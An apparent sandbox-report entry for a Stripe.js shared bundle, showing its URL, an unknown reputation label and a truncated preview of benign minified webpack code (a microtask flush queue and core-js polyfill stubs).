                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/fingerprinted/js/shared-ba94595f3c19f106857cabd615a5ac59.js
                                                                  Preview:(window.webpackChunkStripeJSinner=window.webpackChunkStripeJSinner||[]).push([[3712],{10723:function(e,t,n){"use strict";function a(e){c.length||(i(),!0),c[c.length]=e}function o(){for(;p<c.length;){var e=p;if(p+=1,c[e].call(),p>1024){for(var t=0,n=c.length-p;t<n;t++)c[t]=c[t+p];c.length-=p,p=0}}c.length=0,p=0,!1}function r(e){return function(){function t(){clearTimeout(n),clearInterval(a),e()}var n=setTimeout(t,0),a=setInterval(t,50)}}e.exports=a;var i,u,s,l,c=[],p=0,d=void 0!==n.g?n.g:self,m=d.MutationObserver||d.WebKitMutationObserver;"function"==typeof m?(u=1,s=new m(o),l=document.createTextNode(""),s.observe(l,{characterData:!0}),i=function(){u=-u,l.data=u}):i=r(o),a.requestFlush=i,a.makeRequestCallFromTimer=r},64198:function(e,t,n){var a=n(12897);e.exports=a},14771:function(e,t,n){n(80290);var a=n(5379);e.exports=a("Array","fill")},9554:function(e,t,n){var a=n(64198);e.exports=a},24883:function(e,t,n){var a=n(57475),o=n(69826),r=TypeError;e.exports=function(e){if(a(e))return e;th
                                                                  No static file info